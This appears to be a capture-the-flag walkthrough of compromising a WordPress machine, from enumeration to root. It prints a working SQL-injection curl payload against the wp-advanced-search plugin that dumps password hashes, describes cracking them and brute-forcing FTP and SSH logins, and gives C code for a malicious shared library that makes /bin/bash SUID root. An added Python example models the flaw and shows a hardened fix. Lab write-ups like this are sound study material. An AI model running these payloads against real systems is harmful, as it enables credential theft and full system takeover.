Enumeration

Nmap

The initial nmap scan showed SSH, FTP and HTTP open, and service detection on the HTTP port indicated that the site was running WordPress.

[screenshot: nmap and wp]

Web Enumeration

I visited the web page and found a button linked to a sample page.

[screenshot: web]

The link pointed at a hostname rather than the IP, so I added the hostname to my /etc/hosts file.

[screenshot: sample page]

[screenshot: /etc/hosts]

Exploitation

Wpscan

I then ran wpscan against the target domain and enumerated three usernames.

[screenshot: wpscan]

[screenshot: users]

I then used wpscan to brute-force those accounts. What it did turn up, however, was that the wp-advanced-search plugin was outdated.

[screenshot: wp-advanced-search]

The plugin does not sanitize and escape the t parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks. Since t is the table name, the injection point is unquoted: the payload supplies the real table plus an alias, appends a UNION SELECT of its own, and comments out the rest of the statement with --.

While searching for that plugin, I found a proof-of-concept on the WPScan advisory page.

[screenshot: exploit]

I then ran the command below to obtain both usernames and hashed passwords. The hostname wordpress.ddev.site is the one from the advisory's proof of concept; substitute the target hostname added to /etc/hosts.

curl "https://wordpress.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20wp_users%20UNION%20SELECT%20user_pass%20FROM%20wp_users--&f=user_login&type=&e"
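To make the injection concrete, here is an added example (not code from the post or from the plugin) that models the autocompletion query in SQLite. The query shape, the table schema, the rows and the allow-list names are all assumptions chosen to be consistent with the PoC payload; the vulnerable function splices t and f into the statement, and the hardened one shows the fix.

```python
import sqlite3
from typing import List

# Constructed sample rows standing in for wp_users; the hashes are placeholders,
# not data from the box.
SAMPLE_USERS = [
    ("admin", "$P$BplaceholderHashForAdmin0000000000"),
    ("charlie", "$P$BplaceholderHashForCharlie00000000"),
]

# The value of t from the advisory's proof of concept, URL-decoded.
PAYLOAD_T = "wp_users wp_users UNION SELECT user_pass FROM wp_users--"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (user_login TEXT, user_pass TEXT)")
    conn.executemany("INSERT INTO wp_users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_autocomplete(conn: sqlite3.Connection, q: str, t: str, f: str) -> List[str]:
    """Assumed shape of the plugin's query: table (t) and column (f) names are
    concatenated into the statement unescaped, so t controls the FROM clause
    and everything after it."""
    sql = f"SELECT DISTINCT {f} FROM {t} WHERE {f} LIKE '{q}%'"
    return sorted(row[0] for row in conn.execute(sql))


# Allow-list of searchable tables and columns (hypothetical names for this example).
ALLOWED = {"wp_users": {"user_login"}}


def hardened_autocomplete(conn: sqlite3.Connection, q: str, t: str, f: str) -> List[str]:
    """Identifiers must come from the allow-list; the search term is bound as a
    parameter with LIKE wildcards escaped, so no user input reaches the SQL text."""
    if t not in ALLOWED or f not in ALLOWED[t]:
        raise ValueError(f"refusing unknown table/column: {t!r}.{f!r}")
    pattern = q.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_") + "%"
    sql = f"SELECT DISTINCT {f} FROM {t} WHERE {f} LIKE ? ESCAPE '\\'"
    return sorted(row[0] for row in conn.execute(sql, (pattern,)))


if __name__ == "__main__":
    db = make_db()
    print("normal  :", vulnerable_autocomplete(db, "admin", "wp_users", "user_login"))
    print("injected:", vulnerable_autocomplete(db, "admin", PAYLOAD_T, "user_login"))
```

With the payload, the statement becomes `SELECT DISTINCT user_login FROM wp_users wp_users UNION SELECT user_pass FROM wp_users-- WHERE ...`, so the password hashes come back in the same result set as the logins, which is exactly what the curl above returns.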

Crack Wordpress Hashes

I then cracked the WordPress hashes with hashcat in mode 400 (phpass, the $P$ format WordPress stores in wp_users) and recovered two passwords.

[screenshot: passwords]

FTP Brute Force

Using the enumerated usernames and the cracked passwords, I brute-forced the FTP login and found one valid credential pair.

[screenshot: ftp brute]

The FTP account landed in the WordPress web root, so I downloaded the wp-config.php file.

[screenshot: ftp]

It contained a password (wp-config.php is where WordPress keeps its database credentials).

[screenshot: password]

Spraying this password against the known usernames over SSH gave me a valid login for the charlie user. I logged in and read the flag.

[screenshot: charlie]

Privilege Escalation

SUID bit on wp-monitor

The wp-monitor binary had the SUID bit set.

[screenshot: suid]

I ran strings on the binary and found that it was probably loading a shared library. The strings output gives the library name and the path it is looked up in; running the binary under ltrace or strace (on a non-SUID copy, since ptrace is refused on a SUID process) would confirm the dlopen call and the exact path.

[screenshot: strings]

So I first created the directory in which the binary expected to find the shared library.

[screenshot: mkdir lib under ted]

Then I compiled a small C file into a shared library with a constructor, so that its code runs as soon as wp-monitor loads it:

/* library.c: the constructor runs automatically when the SUID wp-monitor
 * loads this library, i.e. with effective uid 0. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid() */

static void func(void) __attribute__ ((constructor));

static void func(void) {
   setuid(0);                        /* make the real uid 0 too, so the shell spawned below keeps root */
   system("chmod +s /bin/bash");     /* afterwards: /bin/bash -p gives a root shell */
}

/* Build it; the output name and path must match what wp-monitor loads: */
gcc -shared -fPIC -Wall -o /desired/path/to/library.so library.c

After transferring the library to that path and running wp-monitor again, I obtained a root shell.

[screenshot: root shell]

